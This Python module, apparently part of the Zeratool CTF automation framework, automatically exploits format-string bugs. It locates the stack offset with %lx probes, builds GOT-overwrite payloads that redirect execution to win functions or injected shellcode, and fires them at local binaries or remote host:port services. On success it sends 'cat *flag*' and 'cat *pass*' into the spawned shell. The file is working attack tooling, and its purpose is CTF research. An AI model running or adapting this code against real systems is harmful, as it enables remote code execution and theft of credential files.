import angr
from angr import sim_options as so
import claripy
from pwn import *
from zeratool import printf_model
from .overflowExploiter import getRegValues, findShellcode
from .simgr_helper import getShellcode
import timeout_decorator
import time
import string
import logging

log = logging.getLogger(__name__)


def exploitFormat(binary_name, properties):
    """Exploit a format-string bug in a local binary via a GOT overwrite.

    The binary is first probed with ``%<n>$lx``-style inputs until the marker
    bytes placed at the start of the controlled buffer are echoed back; that
    ``n`` is the format-string offset (``stack_position``).  If win functions
    are known, every GOT entry is overwritten in turn with each win-function
    address until ``sendExploit`` reports a flag.

    Args:
        binary_name: Path of the target binary, forwarded to ``runIteration``
            and ``sendExploit``.
        properties: Analysis results.  Keys read here: ``pwn_type``
            (``position``, ``length``, ``input``), ``protections`` (``arch``,
            ``got``, ``nx``), ``win_functions`` and ``input_type``.

    Returns:
        ``None`` when the buffer offset cannot be located or when there are no
        win functions (shellcode / one-gadget branches).  Otherwise a dict with
        ``flag_found`` and, on success, the winning ``input``.
    """
    exploit_results = {"flag_found": False}

    pwn_type = properties["pwn_type"]
    input_pos = pwn_type["position"]
    input_len = pwn_type["length"]
    input_string = pwn_type["input"]
    arch = properties["protections"]["arch"]

    if "64" in arch:
        context.arch = "amd64"

    # Slice controlled input: everything before and after the bytes we own
    start_slice = input_string[:input_pos]
    end_slice = input_string[input_pos + input_len :]

    format_specifier = b"lx"
    format_prefix = b"aaaa_%"
    if "amd64" in arch:
        format_specifier = b"llx"
        format_prefix = b"aaaaaaaa_%"

    stack_position = -1
    log.info("[~] Locating buffer stack location")
    # Determine stack location
    for i in range(1, 50):
        iter_string = format_prefix + str(i).encode() + b"$" + format_specifier + b"_"
        iter_string = assembleInput(iter_string, start_slice, end_slice, input_len)
        log.info(iter_string)
        results = runIteration(
            binary_name, iter_string, input_type=properties["input_type"]
        )
        if b"61616161" in results:  # 0x61616161 == "aaaa", our marker
            stack_position = i
            log.info("[+] Found stack location at {}".format(stack_position))
            break

    if stack_position == -1:
        log.info("Could not find stack position")
        return None

    # Truthiness covers both an empty mapping and None.
    if properties["win_functions"]:
        for func in properties["win_functions"]:
            address = properties["win_functions"][func]["fcn_addr"]
            for got_name, got_addr in list(properties["protections"]["got"].items()):
                log.info("[~] Overwritting {} -> {}".format(got_name, hex(address)))
                writes = {got_addr: address}
                format_payload = fmtstr_payload(
                    stack_position, writes, numbwritten=input_pos
                )
                # Only fall back to short writes when the default payload
                # does not fit in the controlled region.
                if len(format_payload) > input_len:
                    log.info("[~] Format input to large, shrinking")
                    format_payload = fmtstr_payload(
                        stack_position,
                        writes,
                        numbwritten=input_pos,
                        write_size="short",
                    )

                format_input = assembleInput(
                    format_payload, start_slice, end_slice, input_len
                )

                log.info(repr(format_input))
                results = sendExploit(binary_name, properties, format_input)
                if results["flag_found"]:
                    exploit_results["flag_found"] = results["flag_found"]
                    exploit_results["input"] = format_input
                    return exploit_results
        return exploit_results

    if not properties["protections"]["nx"]:
        log.info("[+] Binary does not have NX")
        log.info("[+] Overwriting GOT entry to point to shellcode")
        # NOTE(review): the value returned by rediscoverAndExploit is not
        # propagated to the caller; this mirrors the existing behaviour.
        rediscoverAndExploit(binary_name, properties, stack_position)
    else:
        log.info("[+] Overwriting GOT entry to point to one gadget RCE")
    return None

"""
Symbolically execute the binary until the hooked printf is reached,
then constrain the input to a crafted string:
    String = (format-string GOT write) + (shellcode)
"""


def _restore_registers(state, reg_values):
    """Store every register value present in ``reg_values`` into ``state``."""
    for register in list(state.arch.register_names.values()):
        if register in reg_values:  # registers missing from reg_values are left untouched
            state.registers.store(register, reg_values[register])


def rediscoverAndExploit(binary_name, properties, stack_position):
    """Symbolically re-run the binary with ``printf`` hooked by the exploiter.

    ``properties`` is extended with ``shellcode`` and ``stack_position`` and
    handed to the hooked ``printf`` through ``state.globals``.  Exploration
    stops at the first state whose globals contain ``"type"``.

    Args:
        binary_name: Path of the binary to load into angr.
        properties: Analysis results; ``input_type`` selects how the initial
            state is built (``STDIN``, ``LIBPWNABLE`` or anything else, which
            is treated as a command-line argument).
        stack_position: Format-string offset of the controlled buffer.

    Returns:
        A dict whose ``type`` is ``None`` unless a state was found; on success
        it also carries ``position``, ``length`` and, for ``STDIN`` /
        ``LIBPWNABLE`` / ``ARG`` input types, ``input``.
    """
    properties["shellcode"] = getShellcode(properties)
    properties["stack_position"] = stack_position
    inputType = properties["input_type"]

    extras = {so.REVERSE_MEMORY_NAME_MAP, so.TRACK_ACTION_HISTORY, so.TRACK_CONSTRAINTS}

    p = angr.Project(binary_name, load_options={"auto_load_libs": False})

    p.hook_symbol("printf", printFormatSploit())

    # Setup state based on input type
    argv = [binary_name]
    input_arg = claripy.BVS("input", 400 * 8)
    if inputType == "STDIN":
        # angr doesn't use the right base and stack pointers when loading the
        # binary, so our addresses are all wrong and we grab them manually.
        entryAddr = p.loader.main_object.entry
        reg_values = getRegValues(binary_name, entryAddr)
        state = p.factory.full_init_state(
            args=argv,
            add_options=extras,
            stdin=input_arg,
            env=os.environ,
        )
        _restore_registers(state, reg_values)

    elif inputType == "LIBPWNABLE":
        handle_connection = p.loader.main_object.get_symbol("handle_connection")
        start_addr = handle_connection.rebased_addr

        reg_values = getRegValues(binary_name, start_addr)

        state = p.factory.entry_state(
            args=argv,
            env=os.environ,
            addr=start_addr,
            add_options=extras,
            stdin=input_arg,
        )
        _restore_registers(state, reg_values)

    else:
        arg = claripy.BVS("arg1", 300 * 8)
        argv.append(arg)
        state = p.factory.full_init_state(args=argv)
        state.globals["arg"] = arg

    state.libc.buf_symbolic_bytes = 0x100
    state.globals["user_input"] = input_arg
    state.globals["inputType"] = inputType
    state.globals["properties"] = properties
    simgr = p.factory.simgr(state)

    run_environ = {"type": None}
    end_state = None
    # Lame way to do a timeout
    try:

        @timeout_decorator.timeout(1200)
        def exploreBinary(simgr):
            simgr.explore(find=lambda s: "type" in s.globals)

        exploreBinary(simgr)
        if "found" in simgr.stashes and len(simgr.found):
            end_state = simgr.found[0]
            run_environ["type"] = end_state.globals["type"]
            run_environ["position"] = end_state.globals["position"]
            run_environ["length"] = end_state.globals["length"]

    except (KeyboardInterrupt, timeout_decorator.TimeoutError):
        log.info("[~] Format check timed out")

    if end_state is not None:
        if inputType in ("STDIN", "LIBPWNABLE"):
            stdin_str = str(end_state.posix.dumps(0))
            log.info("[+] Triggerable with STDIN : {}".format(stdin_str))
            run_environ["input"] = stdin_str
        elif inputType == "ARG":
            # cast_to=bytes matches the other solver.eval calls in this file.
            arg_str = str(end_state.solver.eval(arg, cast_to=bytes))
            run_environ["input"] = arg_str
            log.info("[+] Triggerable with arg : {}".format(arg_str))

    return run_environ


def get_num_constraints(chop_byte, state):
    """Count the solver constraints of ``state`` that mention ``chop_byte``.

    A constraint counts once when any AST yielded by its
    ``recursive_children_asts`` structurally matches ``chop_byte``.
    """
    return sum(
        1
        for constraint in state.solver.constraints
        if any(
            chop_byte.structurally_match(child)
            for child in constraint.recursive_children_asts
        )
    )


# Better symbolic strlen
def get_max_strlen(state, value):
    """Return the longest string length the solver allows for ``value``.

    ``value`` is walked in 8-bit chunks.  The index of the first chunk that
    cannot be non-zero is returned; if every chunk can be non-zero the total
    number of chunks is returned.
    """
    last_index = -1
    for last_index, byte in enumerate(value.chop(8)):  # Chop by byte
        may_be_nonzero = state.solver.satisfiable([byte != 0x00])
        if may_be_nonzero:
            continue
        log.debug("Found the null at offset : {}".format(last_index + 1))
        return last_index
    return last_index + 1


def get_trimmed_input(user_input, state):
    """Solve ``user_input`` to bytes and drop its unconstrained tail.

    The input is walked byte by byte; ``trim_index`` tracks the start of the
    current run of bytes that no solver constraint mentions and is reset as
    soon as a constrained byte is seen, so only a *trailing* unconstrained run
    is removed.

    Args:
        user_input: Symbolic input value; must support ``chop(8)``.
        state: State whose solver is used to count constraints and to
            concretise ``user_input``.

    Returns:
        The concretised input, truncated at the start of the trailing
        unconstrained run when that run begins after index 0; otherwise the
        full concretised input.
    """
    trim_index = -1
    for index, c in enumerate(user_input.chop(8)):
        if get_num_constraints(c, state) == 0:
            if trim_index == -1:
                trim_index = index
        else:
            # A constrained byte ends any unconstrained run seen so far.
            trim_index = -1

    input_bytes = state.solver.eval(user_input, cast_to=bytes)

    if trim_index > 0:
        log.debug("Found input without constraints starting at {}".format(trim_index))
        return input_bytes[:trim_index]

    return input_bytes


class printFormatSploit(angr.procedures.libc.printf.printf):
    """``printf`` hook that tries to turn a controlled format string into a shell.

    When the hooked ``printf`` runs, :meth:`checkExploitable` looks for
    symbolic bytes in the format buffer, builds a GOT-overwrite payload
    followed by shellcode and launches it against the real binary with
    ``sendExploit``.  On success the finding is recorded in
    ``self.state.globals`` under ``type``, ``position`` and ``length``;
    otherwise :meth:`run` falls back to the parent ``printf``.
    """

    IS_FUNCTION = True

    @staticmethod
    def _longest_symbolic_run(symbolic_list):
        """Locate the longest run of consecutive symbolic bytes.

        Returns ``(position, count)`` where ``position`` is the index at which
        the run starts and ``count`` is the number of adjacent symbolic
        *pairs* in it, i.e. one less than the number of bytes in the run.  A
        lone symbolic byte therefore yields a count of 0.
        """
        position = 0
        count = 0
        greatest_count = 0
        for sym_i in range(1, len(symbolic_list)):
            if symbolic_list[sym_i] and symbolic_list[sym_i - 1]:
                count += 1
                if count > greatest_count:
                    greatest_count = count
                    position = sym_i - count
            else:
                count = 0
        return position, greatest_count

    @staticmethod
    def _short_write(stack_pos, got_addr, target, written):
        """Build a short-write format payload storing ``target`` at ``got_addr``."""
        return fmtstr_payload(
            stack_pos, {got_addr: target}, numbwritten=written, write_size="short"
        )

    def _solve_input(self, snapshot, loc, var_len, position, payload):
        """Constrain a copy of ``snapshot`` to carry ``payload``.

        Returns the constrained copy together with the trimmed, concretised
        user input taken from that copy.
        """
        attempt = snapshot.copy()
        region = attempt.memory.load(loc, var_len)
        self.constrainBytes(
            attempt, region, loc, position, len(payload), strVal=payload
        )
        user_input = get_trimmed_input(attempt.globals["user_input"], attempt)
        return attempt, user_input

    def _record_finding(self, symVar, loc, position, length, payload):
        """Constrain ``self.state`` to the winning payload and flag the state."""
        self.constrainBytes(
            self.state, symVar, loc, position, len(payload), strVal=payload
        )
        self.state.globals["type"] = "Format"
        self.state.globals["position"] = position
        self.state.globals["length"] = length

    def checkExploitable(self, fmt):
        """Try to exploit the format string passed to this ``printf`` call.

        For every GOT entry in ``properties["protections"]["got"]`` two
        payloads are tried: first one that points the entry at the shellcode
        address as angr sees it, then, if that fails, one that uses the
        address reported by ``findShellcode``.  Every attempt works on a copy
        of a clean snapshot, so a failed attempt leaves no constraints behind
        for the next one.

        Args:
            fmt: Format argument of the hooked call; only passed to
                ``_sim_strlen``.

        Returns:
            ``True`` when ``sendExploit`` reported a flag for one of the
            payloads (the finding is then stored in ``self.state.globals``),
            ``False`` otherwise.
        """
        max_read_len = 1024
        state = self.state
        properties = state.globals["properties"]

        # The format buffer is the first argument of the call.
        var_loc = state.solver.eval(self.arguments[0])

        # Parts of this argument could be symbolic, so we need
        # to check every byte
        var_data = state.memory.load(var_loc, max_read_len)
        var_len = get_max_strlen(state, var_data)

        # The returned length is unused.  The call is kept from the original
        # implementation in case the inlined strlen affects the state.
        # NOTE(review): confirm and drop it if it has no side effects.
        self._sim_strlen(fmt)

        if var_len == 0:
            log.info("[-] Format buffer is empty, nothing to constrain")
            return False

        # Reload with just our max len
        var_data = state.memory.load(var_loc, var_len)

        log.info("Building list of symbolic bytes")
        symbolic_list = [
            state.memory.load(var_loc + x, 1).symbolic for x in range(var_len)
        ]
        log.info("Done Building list of symbolic bytes")

        # Iterate over the characters in the string, checking for where our
        # symbolic values are.  This helps in weird cases like:
        #
        #   char myVal[100] = "I'm cool ";
        #   strcat(myVal, STDIN);
        #   printf("My super cool string is %s", myVal);
        position, greatest_count = self._longest_symbolic_run(symbolic_list)
        log.info(
            "[+] Found symbolic buffer at position {} of length {}".format(
                position, greatest_count
            )
        )

        if greatest_count <= 0:
            return False

        shellcode = properties["shellcode"]
        if isinstance(shellcode, str):
            shellcode = shellcode.encode()
        stack_pos = properties["stack_position"]
        binary_name = state.project.filename
        main_object = state.project.loader.main_object

        # Clean baseline: every attempt below constrains a copy of this.
        snapshot = state.copy()

        for got_name, got_addr in list(properties["protections"]["got"].items()):
            log.info("[+] Overwiting {} at {}".format(got_name, hex(got_addr)))

            # Mock write to get approx length
            write_len = len(
                self._short_write(stack_pos, got_addr, var_loc + position, position)
            )

            # Real write: the shellcode sits right after the format write
            buffer_address = var_loc + position + write_len
            format_write = self._short_write(
                stack_pos, got_addr, buffer_address, position
            )

            # Final payload
            format_payload = format_write + shellcode

            attempt, user_input = self._solve_input(
                snapshot, var_loc, var_len, position, format_payload
            )

            log.info("[+] Format buffer at {}".format(hex(var_loc)))
            log.info("[+] Shellcode located at {}".format(hex(buffer_address)))
            log.info("[+] Format write:\n{}".format(repr(format_write)))
            log.info("[+] Constructed payload:\n{}".format(repr(format_payload)))
            log.info("[+] Constructed stdout:\n{}".format(repr(user_input)))

            log.info("[~] Testing payload")
            if sendExploit(binary_name, properties, user_input)["flag_found"]:
                log.info("[+] Vulnerable path found {}".format(repr(user_input)))
                self._record_finding(
                    var_data, var_loc, position, greatest_count, format_payload
                )
                return True

            # Maybe angr still messed up the pointer
            log.info("[-] Payload launch failed. Fixing angr stack pointer")

            # Find the last basic block executed inside the main binary
            main_blocks = [
                addr
                for addr in attempt.history.bbl_addrs
                if main_object.contains_addr(addr)
            ]
            if not main_blocks:
                log.info("[-] No executed basic block inside the main binary")
                continue

            ret_location = findShellcode(
                binary_name, main_blocks[-1], shellcode, attempt.posix.dumps(0)
            )
            if not ret_location:
                log.info("[-] Unable to find shellcode location for corrected stack")
                continue
            real_location = ret_location["offset"]

            retry_loc = snapshot.solver.eval(self.arguments[0])  # Assume it's a pointer
            if retry_loc == 0:
                log.info("[-] Value at stack offset {} not a pointer".format(0))
                continue

            format_write = self._short_write(
                stack_pos, got_addr, real_location, position
            )
            format_payload = format_write + shellcode

            _, user_input = self._solve_input(
                snapshot, retry_loc, var_len, position, format_payload
            )

            log.info("[+] Shellcode located at {}".format(hex(real_location)))
            log.info("[+] Adjusted payload:\n{}".format(repr(format_payload)))
            log.info("[+] Constructed stdout:\n{}".format(repr(user_input)))

            with open("command.input", "wb") as f:
                f.write(user_input)

            if sendExploit(binary_name, properties, user_input)["flag_found"]:
                log.info("[+] Vulnerable path found {}".format(repr(user_input)))
                self._record_finding(
                    var_data, retry_loc, position, greatest_count, format_payload
                )
                return True

        return False

    def constrainBytes(self, state, symVar, loc, position, length, strVal="%x_"):
        """Constrain ``length`` bytes of memory at ``loc`` to repeat ``strVal``.

        The whole region is constrained at once when the solver of ``state``
        allows it; otherwise each byte is constrained individually and bytes
        that cannot take the wanted value are logged and skipped.

        ``symVar`` and ``position`` are accepted for interface compatibility
        but are not used.  NOTE(review): the region starts at ``loc``, not at
        ``loc + position`` -- confirm this is intended for buffers with a
        concrete prefix.
        """
        if length <= 0 or not strVal:
            return

        total_region = self.state.memory.load(loc, length)
        repeats = -(-length // len(strVal))  # ceiling division
        total_format = (strVal * repeats)[:length]
        # If we can constrain it all in one go, then let's do it!
        if state.solver.satisfiable(extra_constraints=[total_region == total_format]):
            log.info("Can constrain it all, let's go!")
            state.add_constraints(total_region == total_format)
            return

        for i in range(length):
            wanted = total_format[i : i + 1] if isinstance(strVal, str) else total_format[i]
            curr_byte = self.state.memory.load(loc + i, 1).get_byte(0)
            constraint = state.solver.And(wanted == curr_byte)
            if state.solver.satisfiable(extra_constraints=[constraint]):
                state.add_constraints(constraint)
            else:
                log.info("[~] Byte {} not constrained to {}".format(i, repr(wanted)))

    def run(self, _, fmt):
        """Attempt exploitation; fall back to the parent ``printf`` on failure."""
        if not self.checkExploitable(fmt):
            return super().run(fmt)


def getRemoteFormat(properties, remote_url, remote_port):
    """Exploit a format-string bug on a remote service via a GOT overwrite.

    Remote counterpart of ``exploitFormat``: the service is probed for the
    format-string offset of the controlled buffer, then every GOT entry is
    overwritten in turn with each win-function address until ``sendExploit``
    reports a flag.

    Args:
        properties: Analysis results.  Keys read here: ``pwn_type``
            (``position``, ``length``, ``input``), ``protections`` (``arch``,
            ``got``) and ``win_functions``.
        remote_url: Host of the remote service.
        remote_port: Port of the remote service.

    Returns:
        ``None`` when the buffer offset cannot be located or when
        ``win_functions`` is ``None``; otherwise a dict with ``flag_found``
        and, on success, the winning ``input``.
    """
    exploit_results = {"flag_found": False}

    pwn_type = properties["pwn_type"]
    input_pos = pwn_type["position"]
    input_len = pwn_type["length"]
    input_string = pwn_type["input"]
    arch = properties["protections"]["arch"]

    if "64" in arch:
        context.arch = "amd64"

    # Slice controlled input
    start_slice = input_string[:input_pos]
    end_slice = input_string[input_pos + input_len :]

    # Same probe as exploitFormat: runIteration only reports chunks that
    # contain b"61616161", i.e. the hex of a lowercase "aaaa" marker.
    format_specifier = b"lx"
    format_prefix = b"aaaa_%"
    if "amd64" in arch:
        format_specifier = b"llx"
        format_prefix = b"aaaaaaaa_%"

    stack_position = -1
    log.info("[~] Locating buffer stack location")
    # Determine stack location
    for i in range(1, 50):
        iter_string = format_prefix + str(i).encode() + b"$" + format_specifier + b"_"
        iter_string = assembleInput(iter_string, start_slice, end_slice, input_len)

        results = runIteration(
            None,
            iter_string,
            remote_server=True,
            remote_url=remote_url,
            remote_port=remote_port,
        )
        if b"61616161" in results:  # 0x61616161 == "aaaa"
            stack_position = i
            log.info("[+] Found stack location at {}".format(stack_position))
            break

    if stack_position == -1:
        # Without an offset no meaningful payload can be built.
        log.info("Could not find stack position")
        return None

    if properties["win_functions"] is not None:
        for func in properties["win_functions"]:
            address = properties["win_functions"][func]["fcn_addr"]
            for got_name, got_addr in list(properties["protections"]["got"].items()):
                log.info("[~] Overwritting {}".format(got_name))
                writes = {got_addr: address}
                format_payload = fmtstr_payload(
                    stack_position, writes, numbwritten=input_pos
                )
                if len(format_payload) > input_len:
                    log.info("[~] Format input to large, shrinking")
                    format_payload = fmtstr_payload(
                        stack_position,
                        writes,
                        numbwritten=input_pos,
                        write_size="short",
                    )

                format_input = assembleInput(
                    format_payload, start_slice, end_slice, input_len
                )

                log.info(repr(format_input))
                results = sendExploit(
                    None,
                    properties,
                    format_input,
                    remote_server=True,
                    remote_url=remote_url,
                    port_num=remote_port,
                )
                if results["flag_found"]:
                    exploit_results["flag_found"] = results["flag_found"]
                    exploit_results["input"] = format_input
                    return exploit_results
        return exploit_results
    return None


"""
Pad the crafted input so the overall input keeps its original size.
TODO: do this with angr instead, adding the padding
as constraints on a path.
"""


def assembleInput(str_input, start_slice, end_slice, input_len):
    """Pad ``str_input`` with ``b"A"`` up to ``input_len`` and re-wrap it.

    Input that is already ``input_len`` bytes or longer is left unpadded.
    The result is ``start_slice + padded input + end_slice``.
    """
    filler = b"A" * (input_len - len(str_input))
    if filler:
        str_input += filler
    return start_slice + str_input + end_slice


def _find_leak(output):
    """Return the first hex-only ``_``-separated chunk holding the marker.

    ``output`` is split on ``b"_"``; chunks made up solely of hexadecimal
    digits are kept, and the first one containing ``b"61616161"`` is returned.
    ``b""`` is returned when there is none.
    """
    hex_digits = string.hexdigits.encode()
    position_leak = [
        chunk
        for chunk in output.split(b"_")
        if all(byte in hex_digits for byte in chunk)
    ]
    log.info(position_leak)
    for chunk in position_leak:
        if b"61616161" in chunk:
            return chunk
    return b""


def runIteration(
    binary_name,
    str_input,
    remote_server=False,
    remote_url="",
    remote_port=0,
    input_type="STDIN",
):
    """Send one probe to the target and return the leaked marker chunk.

    Args:
        binary_name: Path of the local binary (unused for remote targets).
        str_input: Probe bytes to deliver.
        remote_server: Connect to ``remote_url:remote_port`` instead of
            starting a local process (``STDIN`` / ``LIBPWNABLE`` only).
        remote_url: Host of the remote service.
        remote_port: Port of the remote service.
        input_type: ``"STDIN"`` / ``"LIBPWNABLE"`` deliver the probe as a
            line on the tube; any other value passes it as the first
            command-line argument, with trailing NUL bytes stripped.

    Returns:
        The hex chunk of the output that contains ``b"61616161"``, or
        ``b""`` when the marker was not echoed.
    """
    if input_type == "STDIN" or input_type == "LIBPWNABLE":
        if remote_server:
            proc = remote(remote_url, remote_port)
        else:
            proc = process(binary_name)
        proc.sendline(str_input)
    else:
        proc = process([binary_name, str_input.rstrip(b"\x00")])

    results = proc.recvall(timeout=5)
    log.info(results)
    return _find_leak(results)


def _launch_target(
    binary_name, properties, input_string, remote_server, remote_url, port_num
):
    """Start (or connect to) the target and deliver ``input_string``.

    Returns the tube, or ``None`` when the argument-driven process could not
    be started.
    """
    if properties["input_type"] == "STDIN" or properties["input_type"] == "LIBPWNABLE":
        # Create local or remote process
        if remote_server:
            proc = remote(remote_url, port_num)
        else:
            proc = process(binary_name)
        proc.sendline(input_string)
        return proc

    try:
        return process([binary_name, input_string])
    except Exception:
        log.info("[-] Issue with nulls in arg")
        return None


def sendExploit(
    binary_name,
    properties,
    input_string,
    remote_server=False,
    remote_url="",
    port_num=0,
):
    """Fire ``input_string`` at the target and look for a flag.

    The target is run once and its output checked for both ``{`` and ``}``.
    If they are not both present the target is run a second time and a few
    shell commands (``ls``, ``cat *flag*``, ``cat *pass*``) are sent, on the
    assumption that the payload spawned a shell.

    Args:
        binary_name: Path of the local binary (unused for remote targets).
        properties: Analysis results; ``input_type`` decides whether the
            input is sent on the tube or passed as a command-line argument.
        input_string: Exploit bytes.
        remote_server: Connect to ``remote_url:port_num`` instead of starting
            a local process.
        remote_url: Host of the remote service.
        port_num: Port of the remote service.

    Returns:
        A dict with a single boolean key, ``flag_found``.
    """
    send_results = {"flag_found": False}

    proc = _launch_target(
        binary_name, properties, input_string, remote_server, remote_url, port_num
    )

    # Sometimes the flag is just printed.  Receive exactly once: a second
    # recvall on the same tube would discard what was captured.
    results = proc.recvall(timeout=15) if proc is not None else b""
    log.info(results)

    if proc is not None and b"{" in results and b"}" in results:
        send_results["flag_found"] = True
        log.info("[+] Flag found:")
        log.info(results.replace(b"\x20", b""))
        return send_results

    # Flag not in stdout, we may have a shell
    proc = _launch_target(
        binary_name, properties, input_string, remote_server, remote_url, port_num
    )
    if proc is None:
        return send_results

    try:
        proc.sendline()
        proc.sendline(b"ls;\n")
        proc.sendline(b"cat *flag*;\n")
        proc.sendline(b"cat *pass*;\n")
        command_results = proc.recvall(timeout=30)  # Need a better way to "time out"
    except Exception as err:
        # Best effort: a dead target simply means no flag.
        log.info("[-] Shell interaction failed: {}".format(err))
        return send_results

    if b"{" in command_results and b"}" in command_results:
        send_results["flag_found"] = True
        log.info("[+] Flag found:")
        log.info(command_results.replace(b"\x20", b""))

    return send_results
